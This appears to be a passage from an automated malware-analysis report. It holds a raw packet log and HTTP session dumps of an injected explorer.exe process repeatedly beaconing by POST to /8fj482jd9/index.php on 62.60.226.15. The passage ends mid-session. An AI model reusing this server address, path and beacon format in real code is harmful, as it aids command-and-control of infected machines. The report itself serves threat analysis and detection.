                                                Dec 16, 2024 15:29:42.818769932 CET4978280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:42.819242001 CET4978380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:42.940080881 CET804978362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:42.940160990 CET4978380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:42.940294981 CET804978262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:42.940340042 CET4978280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:42.941560984 CET4978380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:43.061357021 CET804978362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:44.244076967 CET804978362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:44.244429111 CET4978380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:45.864034891 CET4978380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:45.864794016 CET4978480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:45.984548092 CET804978362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:45.984575033 CET804978462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:45.984633923 CET4978380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:45.984735012 CET4978480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:45.984971046 CET4978480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:46.105000019 CET804978462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:47.343539000 CET804978462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:47.343687057 CET4978480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:48.850183964 CET4978480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:48.850539923 CET4978580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:48.970402956 CET804978562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:48.970424891 CET804978462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:48.970498085 CET4978580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:48.970524073 CET4978480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:48.970845938 CET4978580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:49.090536118 CET804978562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:50.241635084 CET804978562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:50.245706081 CET4978580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:51.864356041 CET4978580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:51.867727041 CET4978680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:51.984627008 CET804978562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:51.987601995 CET804978662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:51.987749100 CET4978580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:51.991858006 CET4978680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:51.995702028 CET4978680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:52.116066933 CET804978662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:53.259152889 CET804978662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:53.259228945 CET4978680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:54.771126032 CET4978680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:54.771441936 CET4978780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:54.891325951 CET804978762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:54.891407013 CET4978780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:54.891597033 CET4978780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:54.892097950 CET804978662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:54.892175913 CET4978680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:55.012064934 CET804978762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:56.163078070 CET804978762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:56.163703918 CET4978780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:57.786751032 CET4978780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:57.787197113 CET4978880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:57.907182932 CET804978862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:57.907200098 CET804978762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:57.907285929 CET4978780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:57.907295942 CET4978880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:57.907567024 CET4978880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:29:58.027443886 CET804978862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:59.175875902 CET804978862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:29:59.176037073 CET4978880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:00.692734003 CET4978980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:00.692734003 CET4978880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:00.813189983 CET804978962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:00.813308001 CET4978980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:00.813570023 CET4978980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:00.813679934 CET804978862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:00.814089060 CET4978880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:00.933374882 CET804978962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:02.089543104 CET804978962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:02.089631081 CET4978980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:03.723893881 CET4978980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:03.724215031 CET4979080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:03.844136000 CET804979062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:03.844156981 CET804978962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:03.844224930 CET4979080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:03.844271898 CET4978980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:03.844510078 CET4979080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:03.964467049 CET804979062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:05.282505989 CET804979062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:05.282732964 CET4979080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:06.786593914 CET4979080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:06.786600113 CET4979180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:06.906667948 CET804979162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:06.906934977 CET804979062.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:06.906951904 CET4979180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:06.907020092 CET4979080192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:06.907111883 CET4979180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:07.026998997 CET804979162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:08.180849075 CET804979162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:08.182138920 CET4979180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:09.802690029 CET4979180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:09.803133011 CET4979280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:09.924989939 CET804979262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:09.925229073 CET804979162.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:09.925282955 CET4979180192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:09.925286055 CET4979280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:09.927575111 CET4979280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:10.049376965 CET804979262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:11.266268969 CET804979262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:11.266405106 CET4979280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:12.772713900 CET4979380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:12.772780895 CET4979280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:12.893234968 CET804979362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:12.893326044 CET4979380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:12.893590927 CET804979262.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:12.893666029 CET4979380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:12.893707991 CET4979280192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:13.014584064 CET804979362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:14.165957928 CET804979362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:14.166027069 CET4979380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:15.787467957 CET4979380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:15.787946939 CET4979480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:15.908948898 CET804979462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:15.909027100 CET4979480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:15.909091949 CET804979362.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:15.909135103 CET4979380192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:15.909370899 CET4979480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:16.029133081 CET804979462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:17.181735039 CET804979462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:17.187702894 CET4979480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:18.692873001 CET4979480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:18.693054914 CET4979580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:18.812968016 CET804979562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:18.813055038 CET804979462.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:18.813123941 CET4979580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:18.813208103 CET4979480192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:18.813699007 CET4979580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:18.933911085 CET804979562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:20.087594032 CET804979562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:20.087650061 CET4979580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:21.708230019 CET4979580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:21.708606005 CET4979680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:21.828505039 CET804979662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:21.828596115 CET4979680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:21.828835011 CET4979680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:21.829020023 CET804979562.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:21.829071999 CET4979580192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:21.948607922 CET804979662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:23.097453117 CET804979662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:23.097527027 CET4979680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:24.615386963 CET4979680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:24.615797997 CET4979780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:24.735610962 CET804979762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:24.735632896 CET804979662.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:24.735742092 CET4979680192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:24.735835075 CET4979780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:24.736413956 CET4979780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:24.856540918 CET804979762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:26.007086992 CET804979762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:26.007164001 CET4979780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:27.630059958 CET4979780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:27.637624025 CET4979880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:27.751364946 CET804979762.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:27.751432896 CET4979780192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:27.758932114 CET804979862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:27.759016991 CET4979880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:27.759300947 CET4979880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:27.879015923 CET804979862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:29.046945095 CET804979862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:29.047734022 CET4979880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:30.560859919 CET4979880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:30.561229944 CET4979980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:30.681051970 CET804979962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:30.681164026 CET4979980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:30.681247950 CET804979862.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:30.681323051 CET4979880192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:30.681500912 CET4979980192.168.2.1062.60.226.15
                                                Dec 16, 2024 15:30:30.803670883 CET804979962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:31.953548908 CET804979962.60.226.15192.168.2.10
                                                Dec 16, 2024 15:30:31.953634977 CET4979980192.168.2.1062.60.226.15

                                                HTTP Request Dependency Graph

                                                • 62.60.226.15

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.104971462.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:26:43.954461098 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:26:45.224833965 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:26:45 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.104971562.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:26:46.858215094 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:26:48.353238106 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:26:48 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.104971762.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:26:50.092807055 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:26:51.362000942 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:26:51 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.104971962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:26:52.998887062 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:26:54.291321993 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:26:54 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                4192.168.2.104972162.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:26:56.047297001 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:26:57.320094109 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:26:57 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.2.104972462.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:26:59.122020006 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:00.400932074 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:00 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.2.104972662.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:02.139483929 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:03.413563013 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:03 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.2.104972962.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:05.123493910 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:06.394505024 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:06 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.2.104973062.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:08.249468088 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:09.527472019 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:09 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.2.104973162.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:11.172192097 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:12.442954063 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:12 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 7 <c><d>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.2.104973262.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:14.186387062 CET155OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Dec 16, 2024 15:27:15.474734068 CET219INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Mon, 16 Dec 2024 14:27:15 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.2.104973362.60.226.15802972C:\Windows\SysWOW64\explorer.exe
                                                TimestampBytes transferredDirectionData
                                                Dec 16, 2024 15:27:17.108700991 CET305OUTPOST /8fj482jd9/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 62.60.226.15
                                                Content-Length: 152
                                                Cache-Control: no-cache
                                                Data Raw: 72 3d 33 44 36 30 32 35 38 37 41 42 31 31 38 32 44 43 42 46 34 38 32 41 30 32 33 33 33 31 36 32 45 37 33 45 44 35 42 30 30 34 38 46 46 41 39 45 42 42 41 36 33 33 34 32 43 30 31 34 39 31 34 30 30 35 38 36 35 33 32 34 41 38 37 32 44 39 32 35 37 39 33 42 35 37 36 44 36 31 35 39 39 36 31 35 38 32 37 43 34 30 33 31 33 41 43 36 31 31 37 36 38 34 37 44 37 41 39 43 35 41 32 45 45 36 39 46 30 35 37 34 36 41 32 32 36 36 34 45 30 39 36 36 38 38 38 35 30 34 39 31
                                                Data Ascii: r=3D602587AB1182DCBF482A02333162E73ED5B0048FFA9EBBA63342C014914005865324A872D925793B576D61599615827C40313AC61176847D7A9C5A2EE69F05746A22664E096688850491
                                                Dec 16, 2024 15:27:18.378388882 CET196INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
